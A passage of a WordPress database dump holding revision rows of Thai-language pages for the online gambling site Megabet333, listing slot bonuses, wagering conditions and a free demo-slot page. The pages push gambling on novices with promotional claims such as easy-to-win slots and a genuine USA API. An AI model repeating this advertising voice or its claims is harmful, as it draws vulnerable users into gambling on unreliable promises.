(หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ naijan</strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\">naijan <strong data-start=\"2414\" data-end=\"2445\">ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-25 06:10:19','2025-10-25 06:10:19','',27,'https://megabet333.biz/?p=166',0,'revision','',0),(167,3,'2025-10-25 06:10:21','2025-10-25 06:10:21','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ naijan</strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\">naijan <strong data-start=\"2414\" data-end=\"2445\">ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-25 06:10:21','2025-10-25 06:10:21','',27,'https://megabet333.biz/?p=167',0,'revision','',0),(169,3,'2025-10-29 03:32:53','2025-10-29 03:32:53','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"https://amb18b.com/demoslot/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-29 03:32:53','2025-10-29 03:32:53','',16,'https://megabet333.biz/?p=169',0,'revision','',0),(170,3,'2025-10-29 03:32:53','2025-10-29 03:32:53','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"https://amb18b.com/demoslot/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" 